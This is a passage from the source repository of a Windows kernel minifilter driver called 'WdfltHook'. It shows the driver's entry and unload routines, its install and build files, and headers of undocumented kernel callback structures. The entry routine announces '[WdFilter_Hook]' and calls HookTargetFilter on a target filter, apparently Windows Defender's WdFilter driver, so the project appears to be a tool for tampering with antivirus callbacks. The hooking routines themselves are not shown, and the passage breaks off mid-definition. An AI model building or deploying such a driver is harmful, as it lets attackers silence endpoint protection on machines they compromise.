470 | return status; 471 | } 472 | 473 | 474 | 475 | NTSTATUS 476 | DriverEntry ( 477 | _In_ PDRIVER_OBJECT DriverObject, 478 | _In_ PUNICODE_STRING RegistryPath 479 | ) 480 | 481 | { 482 | NTSTATUS status; 483 | 484 | UNREFERENCED_PARAMETER( RegistryPath ); 485 | 486 | PT_DBG_PRINT( PTDBG_TRACE_ROUTINES, 487 | ("WdfltHook!DriverEntry: Entered\n") ); 488 | 489 | 490 | status = FltRegisterFilter( DriverObject, 491 | &FilterRegistration, 492 | &gFilterHandle ); 493 | 494 | FLT_ASSERT( NT_SUCCESS( status ) ); 495 | 496 | if (NT_SUCCESS( status )) { 497 | 498 | status = FltStartFiltering( gFilterHandle ); 499 | 500 | if (!NT_SUCCESS( status )) { 501 | 502 | FltUnregisterFilter( gFilterHandle ); 503 | } 504 | } 505 | DbgPrint("[WdFilter_Hook] Loaded!\n"); 506 | DbgPrint("[WdFilter_Hook] Initializing WdFilter driver address range\n");; 507 | InitDriverGlobals(); 508 | HookTargetFilter(TARGET_FILTER_NAME); 509 | return status; 510 | } 511 | 512 | NTSTATUS 513 | WdfltHookUnload ( 514 | _In_ FLT_FILTER_UNLOAD_FLAGS Flags 515 | ) 516 | 517 | { 518 | UNREFERENCED_PARAMETER( Flags ); 519 | 520 | PAGED_CODE(); 521 | 522 | PT_DBG_PRINT( PTDBG_TRACE_ROUTINES, 523 | ("WdfltHook!WdfltHookUnload: Entered\n") ); 524 | UnhookCallbacks(); 525 | CleanupRestoreList(); 526 | 527 | FltUnregisterFilter( gFilterHandle ); 528 | DbgPrint("[WdFilter_Hook] Driver unloaded !\n"); 529 | return STATUS_SUCCESS; 530 | } 531 | 532 | // Pre Operation hook 533 | FLT_PREOP_CALLBACK_STATUS 534 | WdfltHookPreOperation ( 535 | _Inout_ PFLT_CALLBACK_DATA Data, 536 | _In_ PCFLT_RELATED_OBJECTS FltObjects, 537 | _Flt_CompletionContext_Outptr_ PVOID *CompletionContext 538 | ) 539 | 540 | { 541 | 542 | NTSTATUS status; 543 | 544 | UNREFERENCED_PARAMETER( FltObjects ); 545 | UNREFERENCED_PARAMETER( CompletionContext ); 546 | 547 | if (WdfltHookDoRequestOperationStatus( Data )) { 548 | 549 | status = FltRequestOperationStatusCallback( Data, 550 | WdfltHookOperationStatusCallback, 551 | (PVOID)(++OperationStatusCtx) ); 552 | 553 | } 554 | 555 | // DbgPrint("[WdFilter_Hook] Hooked pre operation filter callback :: MajorFunction - 0x%x!\n",Data->Iopb->MajorFunction); 556 | 557 | return FLT_PREOP_SUCCESS_WITH_CALLBACK; 558 | } 559 | 560 | 561 | 562 | VOID 563 | WdfltHookOperationStatusCallback ( 564 | _In_ PCFLT_RELATED_OBJECTS FltObjects, 565 | _In_ PFLT_IO_PARAMETER_BLOCK ParameterSnapshot, 566 | _In_ NTSTATUS OperationStatus, 567 | _In_ PVOID RequesterContext 568 | ) 569 | 570 | { 571 | UNREFERENCED_PARAMETER( FltObjects ); 572 | 573 | PT_DBG_PRINT( PTDBG_TRACE_ROUTINES, 574 | ("WdfltHook!WdfltHookOperationStatusCallback: Entered\n") ); 575 | 576 | PT_DBG_PRINT( PTDBG_TRACE_OPERATION_STATUS, 577 | ("WdfltHook!WdfltHookOperationStatusCallback: Status=%08x ctx=%p IrpMj=%02x.%02x \"%s\"\n", 578 | OperationStatus, 579 | RequesterContext, 580 | ParameterSnapshot->MajorFunction, 581 | ParameterSnapshot->MinorFunction, 582 | FltGetIrpName(ParameterSnapshot->MajorFunction)) ); 583 | } 584 | 585 | 586 | FLT_POSTOP_CALLBACK_STATUS 587 | WdfltHookPostOperation ( 588 | _Inout_ PFLT_CALLBACK_DATA Data, 589 | _In_ PCFLT_RELATED_OBJECTS FltObjects, 590 | _In_opt_ PVOID CompletionContext, 591 | _In_ FLT_POST_OPERATION_FLAGS Flags 592 | ) 593 | 594 | { 595 | 596 | UNREFERENCED_PARAMETER( Data ); 597 | UNREFERENCED_PARAMETER( FltObjects ); 598 | UNREFERENCED_PARAMETER( CompletionContext ); 599 | UNREFERENCED_PARAMETER( Flags ); 600 | 601 | 602 | // DbgPrint("[WdFilter_Hook] Hooked post operation filter callbackn :: MajorFunction - 0x%x!\n", Data->Iopb->MajorFunction); 603 | 604 | return FLT_POSTOP_FINISHED_PROCESSING; 605 | } 606 | 607 | 608 | FLT_PREOP_CALLBACK_STATUS 609 | WdfltHookPreOperationNoPostOperation ( 610 | _Inout_ PFLT_CALLBACK_DATA Data, 611 | _In_ PCFLT_RELATED_OBJECTS FltObjects, 612 | _Flt_CompletionContext_Outptr_ PVOID *CompletionContext 613 | ) 614 | 615 | { 616 | UNREFERENCED_PARAMETER( Data ); 617 | UNREFERENCED_PARAMETER( FltObjects ); 618 | UNREFERENCED_PARAMETER( CompletionContext ); 619 | 620 | PT_DBG_PRINT( PTDBG_TRACE_ROUTINES, 621 | ("WdfltHook!WdfltHookPreOperationNoPostOperation: Entered\n") ); 622 | 623 | 624 | return FLT_PREOP_SUCCESS_NO_CALLBACK; 625 | } 626 | 627 | 628 | BOOLEAN 629 | WdfltHookDoRequestOperationStatus( 630 | _In_ PFLT_CALLBACK_DATA Data 631 | ) 632 | 633 | { 634 | PFLT_IO_PARAMETER_BLOCK iopb = Data->Iopb; 635 | 636 | 637 | 638 | return (BOOLEAN) 639 | 640 | 641 | 642 | (((iopb->MajorFunction == IRP_MJ_FILE_SYSTEM_CONTROL) && 643 | ((iopb->Parameters.FileSystemControl.Common.FsControlCode == FSCTL_REQUEST_FILTER_OPLOCK) || 644 | (iopb->Parameters.FileSystemControl.Common.FsControlCode == FSCTL_REQUEST_BATCH_OPLOCK) || 645 | (iopb->Parameters.FileSystemControl.Common.FsControlCode == FSCTL_REQUEST_OPLOCK_LEVEL_1) || 646 | (iopb->Parameters.FileSystemControl.Common.FsControlCode == FSCTL_REQUEST_OPLOCK_LEVEL_2))) 647 | 648 | || 649 | 650 | ((iopb->MajorFunction == IRP_MJ_DIRECTORY_CONTROL) && 651 | (iopb->MinorFunction == IRP_MN_NOTIFY_CHANGE_DIRECTORY)) 652 | ); 653 | } 654 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/WdfltHook.inf: -------------------------------------------------------------------------------- 1 | ;;; 2 | ;;; WdfltHook 3 | ;;; 4 | 5 | [Version] 6 | Signature = "$Windows NT$" 7 | ; TODO - Change the Class and ClassGuid to match the Load Order Group value, see https://msdn.microsoft.com/en-us/windows/hardware/gg462963 8 | ; Class = "ActivityMonitor" ;This is determined by the work this filter driver does 9 | ; ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Load Order Group value 10 | Class = "ActivityMonitor" 11 | ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} 12 | Provider = "Template" 13 | DriverVer = 09/29/2023,23.51.50.349 14 | CatalogFile = WdfltHook.cat 15 | PnpLockDown=1 16 | 17 | [DestinationDirs] 18 | DefaultDestDir = 12 19 | MiniFilter.DriverFiles = 12 ;%windir%\system32\drivers 20 | 21 | ;; 22 | ;; Default install sections 23 | ;; 24 | 25 | [DefaultInstall] 26 | OptionDesc = %ServiceDescription% 27 | CopyFiles = MiniFilter.DriverFiles 28 | 29 | [DefaultInstall.Services] 30 | AddService = %ServiceName%,,MiniFilter.Service 31 | 32 | ;; 33 | ;; Default uninstall sections 34 | ;; 35 | 36 | [DefaultUninstall] 37 | DelFiles = MiniFilter.DriverFiles 38 | 39 | [DefaultUninstall.Services] 40 | DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting 41 | 42 | ; 43 | ; Services Section 44 | ; 45 | 46 | [MiniFilter.Service] 47 | DisplayName = %ServiceName% 48 | Description = %ServiceDescription% 49 | ServiceBinary = %12%\%DriverName%.sys ;%windir%\system32\drivers\ 50 | Dependencies = "FltMgr" 51 | ServiceType = 2 ;SERVICE_FILE_SYSTEM_DRIVER 52 | StartType = 3 ;SERVICE_DEMAND_START 53 | ErrorControl = 1 ;SERVICE_ERROR_NORMAL 54 | ; TODO - Change the Load Order Group value 55 | ; LoadOrderGroup = "FSFilter Activity Monitor" 56 | LoadOrderGroup = "FSFilter Activity Monitor" 57 | AddReg = MiniFilter.AddRegistry 58 | 59 | ; 60 | ; Registry Modifications 61 | ; 62 | 63 | [MiniFilter.AddRegistry] 64 | HKR,,"DebugFlags",0x00010001 ,0x0 65 | HKR,,"SupportedFeatures",0x00010001,0x3 66 | HKR,"Instances","DefaultInstance",0x00000000,%DefaultInstance% 67 | HKR,"Instances\"%Instance1.Name%,"Altitude",0x00000000,%Instance1.Altitude% 68 | HKR,"Instances\"%Instance1.Name%,"Flags",0x00010001,%Instance1.Flags% 69 | 70 | ; 71 | ; Copy Files 72 | ; 73 | 74 | [MiniFilter.DriverFiles] 75 | %DriverName%.sys 76 | 77 | [SourceDisksFiles] 78 | WdfltHook.sys = 1,, 79 | 80 | [SourceDisksNames] 81 | 1 = %DiskId1%,,, 82 | 83 | ;; 84 | ;; String Section 85 | ;; 86 | 87 | [Strings] 88 | ServiceDescription = "WdfltHook Mini-Filter Driver" 89 | ServiceName = "WdfltHook" 90 | DriverName = "WdfltHook" 91 | DiskId1 = "WdfltHook Device Installation Disk" 92 | 93 | ;Instances specific information. 94 | DefaultInstance = "WdfltHook Instance" 95 | Instance1.Name = "WdfltHook Instance" 96 | ; TODO - Change the altitude value, see https://msdn.microsoft.com/en-us/windows/hardware/drivers/ifs/load-order-groups-and-altitudes-for-minifilter-drivers 97 | Instance1.Altitude = "370030" 98 | Instance1.Flags = 0x0 ; Allow all attachments 99 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/WdfltHook.rc: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #include 4 | 5 | #define VER_FILETYPE VFT_DRV 6 | #define VER_FILESUBTYPE VFT2_DRV_SYSTEM 7 | #define VER_FILEDESCRIPTION_STR "WdfltHook Filter Driver" 8 | #define VER_INTERNALNAME_STR "WdfltHook.sys" 9 | 10 | #include "common.ver" 11 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/WdfltHook.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.33927.289 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WdfltHook", "WdfltHook\WdfltHook.vcxproj", "{0D6423DD-7D02-4436-8C83-7F2069F5F388}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|ARM = Debug|ARM 11 | Debug|ARM64 = Debug|ARM64 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|ARM = Release|ARM 15 | Release|ARM64 = Release|ARM64 16 | Release|x64 = Release|x64 17 | Release|x86 = Release|x86 18 | EndGlobalSection 19 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 20 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM.ActiveCfg = Debug|ARM 21 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM.Build.0 = Debug|ARM 22 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM.Deploy.0 = Debug|ARM 23 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM64.ActiveCfg = Debug|ARM64 24 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM64.Build.0 = Debug|ARM64 25 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|ARM64.Deploy.0 = Debug|ARM64 26 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x64.ActiveCfg = Debug|x64 27 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x64.Build.0 = Debug|x64 28 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x64.Deploy.0 = Debug|x64 29 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x86.ActiveCfg = Debug|Win32 30 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x86.Build.0 = Debug|Win32 31 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Debug|x86.Deploy.0 = Debug|Win32 32 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM.ActiveCfg = Release|ARM 33 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM.Build.0 = Release|ARM 34 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM.Deploy.0 = Release|ARM 35 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM64.ActiveCfg = Release|ARM64 36 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM64.Build.0 = Release|ARM64 37 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|ARM64.Deploy.0 = Release|ARM64 38 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x64.ActiveCfg = Release|x64 39 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x64.Build.0 = Release|x64 40 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x64.Deploy.0 = Release|x64 41 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x86.ActiveCfg = Release|Win32 42 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x86.Build.0 = Release|Win32 43 | {0D6423DD-7D02-4436-8C83-7F2069F5F388}.Release|x86.Deploy.0 = Release|Win32 44 | EndGlobalSection 45 | GlobalSection(SolutionProperties) = preSolution 46 | HideSolutionNode = FALSE 47 | EndGlobalSection 48 | GlobalSection(ExtensibilityGlobals) = postSolution 49 | SolutionGuid = {55558C6C-46F7-434F-A023-93E4BC6B38AD} 50 | EndGlobalSection 51 | EndGlobal 52 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/WdfltHook.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | Debug 22 | ARM 23 | 24 | 25 | Release 26 | ARM 27 | 28 | 29 | Debug 30 | ARM64 31 | 32 | 33 | Release 34 | ARM64 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | {0D6423DD-7D02-4436-8C83-7F2069F5F388} 44 | {f2f62967-0815-4fd7-9b86-6eedcac766eb} 45 | v4.5 46 | 12.0 47 | Debug 48 | Win32 49 | WdfltHook 50 | 51 | 52 | 53 | Windows10 54 | true 55 | WindowsKernelModeDriver10.0 56 | Driver 57 | WDM 58 | 59 | 60 | Windows10 61 | false 62 | WindowsKernelModeDriver10.0 63 | Driver 64 | WDM 65 | 66 | 67 | Windows10 68 | true 69 | WindowsKernelModeDriver10.0 70 | Driver 71 | WDM 72 | 73 | 74 | Windows10 75 | false 76 | WindowsKernelModeDriver10.0 77 | Driver 78 | WDM 79 | 80 | 81 | Windows10 82 | true 83 | WindowsKernelModeDriver10.0 84 | Driver 85 | WDM 86 | 87 | 88 | Windows10 89 | false 90 | WindowsKernelModeDriver10.0 91 | Driver 92 | WDM 93 | 94 | 95 | Windows10 96 | true 97 | WindowsKernelModeDriver10.0 98 | Driver 99 | WDM 100 | 101 | 102 | Windows10 103 | false 104 | WindowsKernelModeDriver10.0 105 | Driver 106 | WDM 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | DbgengKernelDebugger 118 | 119 | 120 | DbgengKernelDebugger 121 | 122 | 123 | DbgengKernelDebugger 124 | 125 | 126 | DbgengKernelDebugger 127 | true 128 | 129 | 130 | DbgengKernelDebugger 131 | 132 | 133 | DbgengKernelDebugger 134 | 135 | 136 | DbgengKernelDebugger 137 | 138 | 139 | DbgengKernelDebugger 140 | 141 | 142 | 143 | fltmgr.lib;%(AdditionalDependencies) 144 | 145 | 146 | 147 | 148 | fltmgr.lib;%(AdditionalDependencies) 149 | 150 | 151 | 152 | 153 | fltmgr.lib;%(AdditionalDependencies) 154 | 155 | 156 | 157 | 158 | fltmgr.lib;%(AdditionalDependencies) 159 | /INTEGRITYCHECK %(AdditionalOptions) 160 | 161 | 162 | $(ProjectDir);%(AdditionalIncludeDirectories) 163 | false 164 | 165 | 166 | 167 | 168 | fltmgr.lib;%(AdditionalDependencies) 169 | 170 | 171 | 172 | 173 | fltmgr.lib;%(AdditionalDependencies) 174 | 175 | 176 | 177 | 178 | fltmgr.lib;%(AdditionalDependencies) 179 | 180 | 181 | 182 | 183 | fltmgr.lib;%(AdditionalDependencies) 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/WdfltHook.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {8E41214B-6785-4CFE-B992-037D68949A14} 18 | inf;inv;inx;mof;mc; 19 | 20 | 21 | 22 | 23 | Driver Files 24 | 25 | 26 | 27 | 28 | Source Files 29 | 30 | 31 | 32 | 33 | Resource Files 34 | 35 | 36 | 37 | 38 | Header Files 39 | 40 | 41 | Header Files 42 | 43 | 44 | Header Files 45 | 46 | 47 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/fltmgtr.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | typedef struct _CALLBACK_NODE 6 | { 7 | LIST_ENTRY CallbackLinks; 8 | PFLT_INSTANCE Instance; 9 | PVOID PreOperation; 10 | PVOID PostOperation; 11 | LONG Flags; 12 | } CALLBACK_NODE, * PCALLBACK_NODE; -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/ntdefs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 4 | 5 | typedef unsigned char BYTE, * PBYTE, * LPBYTE; 6 | 7 | 8 | 9 | typedef struct _PEB_LDR_DATA { 10 | BYTE Reserved1[8]; 11 | PVOID Reserved2[3]; 12 | LIST_ENTRY InMemoryOrderModuleList; 13 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 14 | 15 | typedef struct _RTL_DRIVE_LETTER_CURDIR 16 | { 17 | USHORT Flags; 18 | USHORT Length; 19 | ULONG TimeStamp; 20 | UNICODE_STRING DosPath; 21 | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR; 22 | 23 | #define RTL_MAX_DRIVE_LETTERS 32 24 | 25 | typedef struct _CURDIR 26 | { 27 | UNICODE_STRING DosPath; 28 | HANDLE Handle; 29 | } CURDIR, * PCURDIR; 30 | 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #pragma once 40 | 41 | typedef enum _DCMB_CALLBACK_TYPE { 42 | LoadImageCallback, 43 | ProcessCreationCallback, 44 | ThreadCreationCallback, 45 | ProcessObjectCreationCallback, 46 | ThreadObjectCreationCallback, 47 | RegistryCallback, 48 | DriverVerificationCallback 49 | } DCMB_CALLBACK_TYPE; 50 | 51 | typedef enum _SYSTEM_INFORMATION_CLASS { 52 | SystemBasicInformation = 0, 53 | SystemPerformanceInformation = 2, 54 | SystemTimeOfDayInformation = 3, 55 | SystemProcessInformation = 5, 56 | SystemProcessorPerformanceInformation = 8, 57 | SystemInterruptInformation = 23, 58 | SystemExceptionInformation = 33, 59 | SystemRegistryQuotaInformation = 37, 60 | SystemLookasideInformation = 45, 61 | SystemCodeIntegrityInformation = 103, 62 | SystemPolicyInformation = 134, 63 | } SYSTEM_INFORMATION_CLASS; 64 | 65 | 66 | typedef struct _KLDR_DATA_TABLE_ENTRY 67 | { 68 | LIST_ENTRY InLoadOrderLinks; 69 | PVOID ExceptionTable; 70 | ULONG ExceptionTableSize; 71 | PVOID GpValue; 72 | PNON_PAGED_DEBUG_INFO NonPagedDebugInfo; 73 | PVOID DllBase; 74 | PVOID EntryPoint; 75 | ULONG SizeOfImage; 76 | UNICODE_STRING FullDllName; 77 | UNICODE_STRING BaseDllName; 78 | ULONG Flags; 79 | USHORT LoadCount; 80 | USHORT __Unused5; 81 | PVOID SectionPointer; 82 | ULONG CheckSum; 83 | PVOID LoadedImports; 84 | PVOID PatchInformation; 85 | } KLDR_DATA_TABLE_ENTRY, * PKLDR_DATA_TABLE_ENTRY; 86 | 87 | typedef struct _REGISTRY_CALLBACK_ITEM 88 | { 89 | LIST_ENTRY Item; 90 | DWORD64 Unknown1[2]; 91 | DWORD64 Context; 92 | DWORD64 Function; 93 | UNICODE_STRING Altitude; 94 | DWORD64 Unknown2[2]; 95 | } REGISTRY_CALLBACK_ITEM, * PREGISTRY_CALLBACK_ITEM; 96 | 97 | typedef struct OB_CALLBACK_ENTRY_t { 98 | LIST_ENTRY CallbackList; // linked element tied to _OBJECT_TYPE.CallbackList 99 | OB_OPERATION Operations; // bitfield : 1 for Creations, 2 for Duplications 100 | BOOL Enabled; // self-explanatory 101 | struct OB_CALLBACK_t* Entry; // points to the structure in which it is included 102 | POBJECT_TYPE ObjectType; // points to the object type affected by the callback 103 | POB_PRE_OPERATION_CALLBACK PreOperation; // callback function called before each handle operation 104 | POB_POST_OPERATION_CALLBACK PostOperation; // callback function called after each handle operation 105 | KSPIN_LOCK Lock; // lock object used for synchronization 106 | } OB_CALLBACK_ENTRY, * POB_CALLBACK_ENTRY; 107 | 108 | typedef struct _CALLBACK_OBJECT 109 | { 110 | ULONG Signature; 111 | KSPIN_LOCK Lock; 112 | LIST_ENTRY RegisteredCallbacks; 113 | BOOLEAN AllowMultipleCallbacks; 114 | UCHAR reserved[3]; 115 | } CALLBACK_OBJECT; 116 | 117 | typedef struct _CALLBACK_REGISTRATION 118 | { 119 | LIST_ENTRY Link; 120 | PCALLBACK_OBJECT CallbackObject; 121 | PCALLBACK_FUNCTION CallbackFunction; 122 | PVOID CallbackContext; 123 | ULONG Busy; 124 | BOOLEAN UnregisterWaiting; 125 | } CALLBACK_REGISTRATION, * PCALLBACK_REGISTRATION; 126 | 127 | 128 | 129 | typedef NTSTATUS(NTAPI* PROTOTYPE_ZWQUERYSYSTEMINFORMATION)(SYSTEM_INFORMATION_CLASS info, PVOID infoinout, ULONG len, PULONG retLen); 130 | 131 | typedef struct _RTL_PROCESS_MODULE_INFORMATION 132 | { 133 | ULONG Section; 134 | PVOID MappedBase; 135 | PVOID ImageBase; 136 | ULONG ImageSize; 137 | ULONG Flags; 138 | USHORT LoadOrderIndex; 139 | USHORT InitOrderIndex; 140 | USHORT LoadCount; 141 | USHORT OffsetToFileName; 142 | CHAR FullPathName[256]; 143 | } RTL_PROCESS_MODULE_INFORMATION, * PRTL_PROCESS_MODULE_INFORMATION; 144 | 145 | typedef struct _RTL_PROCESS_MODULES 146 | { 147 | ULONG NumberOfModules; 148 | RTL_PROCESS_MODULE_INFORMATION Modules[1]; 149 | } RTL_PROCESS_MODULES, * PRTL_PROCESS_MODULES; 150 | 151 | typedef struct _RTL_USER_PROCESS_PARAMETERS 152 | { 153 | ULONG MaximumLength; //6c0 154 | ULONG Length;//6c0 155 | ULONG Flags;//0 156 | ULONG DebugFlags;//0 157 | HANDLE ConsoleHandle;//NULL 158 | ULONG ConsoleFlags;//0 159 | HANDLE StandardInput;//NULL 160 | HANDLE StandardOutput;//NULL 161 | HANDLE StandardError;//NULL 162 | CURDIR CurrentDirectory; 163 | UNICODE_STRING DllPath; 164 | UNICODE_STRING ImagePathName; 165 | UNICODE_STRING CommandLine; 166 | PWSTR Environment; 167 | ULONG StartingX; 168 | ULONG StartingY; 169 | ULONG CountX; 170 | ULONG CountY; 171 | ULONG CountCharsX; 172 | ULONG CountCharsY; 173 | ULONG FillAttribute; 174 | ULONG WindowFlags; 175 | ULONG ShowWindowFlags; 176 | UNICODE_STRING WindowTitle; 177 | UNICODE_STRING DesktopInfo; 178 | UNICODE_STRING ShellInfo; 179 | UNICODE_STRING RuntimeData; 180 | RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; 181 | #if (NTDDI_VERSION >= NTDDI_LONGHORN) 182 | SIZE_T EnvironmentSize; 183 | #endif 184 | #if (NTDDI_VERSION >= NTDDI_WIN7) 185 | SIZE_T EnvironmentVersion; 186 | #endif 187 | } RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; 188 | 189 | 190 | typedef struct _PEB { 191 | BYTE Reserved1[2]; 192 | BYTE BeingDebugged; 193 | BYTE Reserved2[1]; 194 | PVOID Reserved3[2]; 195 | PPEB_LDR_DATA Ldr; 196 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 197 | PVOID Reserved4[3]; 198 | PVOID AtlThunkSListPtr; 199 | PVOID Reserved5; 200 | ULONG Reserved6; 201 | PVOID Reserved7; 202 | ULONG Reserved8; 203 | ULONG AtlThunkSListPtr32; 204 | PVOID Reserved9[45]; 205 | BYTE Reserved10[96]; 206 | PVOID PostProcessInitRoutine; 207 | BYTE Reserved11[128]; 208 | PVOID Reserved12[1]; 209 | ULONG SessionId; 210 | } PEB, * PPEB; 211 | 212 | // Modified LDR_DATA_TABLE_ENTRY definition (this one includes BaseDllName field and has InMemoryOrderLinks at the top for easier processing) 213 | typedef struct _LDR_DATA_TABLE_ENTRY { 214 | /*LIST_ENTRY InLoadOrderLinks;*/ 215 | LIST_ENTRY InMemoryOrderLinks; 216 | LIST_ENTRY InInitializationOrderList; 217 | PVOID DllBase; 218 | PVOID EntryPoint; 219 | PVOID Reserved3; 220 | UNICODE_STRING FullDllName; 221 | UNICODE_STRING BaseDllName; 222 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; 223 | 224 | typedef struct _TEB { 225 | PVOID Reserved1[12]; 226 | PPEB ProcessEnvironmentBlock; 227 | PVOID Reserved2[399]; 228 | BYTE Reserved3[1952]; 229 | PVOID TlsSlots[64]; 230 | BYTE Reserved4[8]; 231 | PVOID Reserved5[26]; 232 | PVOID ReservedForOle; // Windows 2000 only 233 | PVOID Reserved6[4]; 234 | PVOID TlsExpansionSlots; 235 | } TEB, * PTEB; 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | /* 244 | NtCreateFile 245 | */ 246 | #define InitializeObjectAttributes( p, n, a, r, s ) { \ 247 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 248 | (p)->RootDirectory = r; \ 249 | (p)->Attributes = a; \ 250 | (p)->ObjectName = n; \ 251 | (p)->SecurityDescriptor = s; \ 252 | (p)->SecurityQualityOfService = NULL; \ 253 | } 254 | 255 | #define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 256 | 257 | /* 258 | valid values for the attributes field 259 | */ 260 | #define OBJ_INHERIT 0x00000002L 261 | #define OBJ_PERMANENT 0x00000010L 262 | #define OBJ_EXCLUSIVE 0x00000020L 263 | #define OBJ_CASE_INSENSITIVE 0x00000040L 264 | #define OBJ_OPENIF 0x00000080L 265 | #define OBJ_OPENLINK 0x00000100L 266 | #define OBJ_KERNEL_HANDLE 0x00000200L 267 | #define OBJ_FORCE_ACCESS_CHECK 0x00000400L 268 | #define OBJ_IGNORE_IMPERSONATED_DEVICEMAP 0x00000800L 269 | #define OBJ_DONT_REPARSE 0x00001000L 270 | #define OBJ_VALID_ATTRIBUTES 0x00001FF2 271 | 272 | 273 | 274 | /* 275 | NtQueryInformationFile 276 | */ 277 | 278 | 279 | #define FileStandardInformation 5 // QUERY: FILE_STANDARD_INFORMATION 280 | 281 | 282 | 283 | /* 284 | NtOpenProcess 285 | */ 286 | 287 | 288 | typedef struct _SYSTEM_PROCESS_INFO 289 | { 290 | ULONG NextEntryOffset; 291 | ULONG NumberOfThreads; 292 | LARGE_INTEGER Reserved[3]; 293 | LARGE_INTEGER CreateTime; 294 | LARGE_INTEGER UserTime; 295 | LARGE_INTEGER KernelTime; 296 | UNICODE_STRING ImageName; 297 | ULONG BasePriority; 298 | HANDLE ProcessId; 299 | HANDLE InheritedFromProcessId; 300 | }SYSTEM_PROCESS_INFO, * PSYSTEM_PROCESS_INFO; 301 | 302 | 303 | /* 304 | NtCreateUserProcess 305 | */ 306 | 307 | #define RTL_USER_PROCESS_PARAMETERS_NORMALIZED 0x01 308 | 309 | // ProcessFlags 310 | #define PROCESS_CREATE_FLAGS_PROTECTED_PROCESS 0x00000040 311 | #define PROCESS_CREATE_FLAGS_CREATE_SESSION 0x00000080 // ? 312 | #define PROCESS_CREATE_FLAGS_INHERIT_FROM_PARENT 0x00000100 313 | #define PROCESS_CREATE_FLAGS_SUSPENDED 0x00000200 314 | #define PROCESS_CREATE_FLAGS_EXTENDED_UNKNOWN 0x00000400 315 | 316 | // ThreadFlags 317 | #define THREAD_CREATE_FLAGS_CREATE_SUSPENDED 0x00000001 318 | #define THREAD_CREATE_FLAGS_SKIP_THREAD_ATTACH 0x00000002 // ? 319 | #define THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER 0x00000004 320 | #define 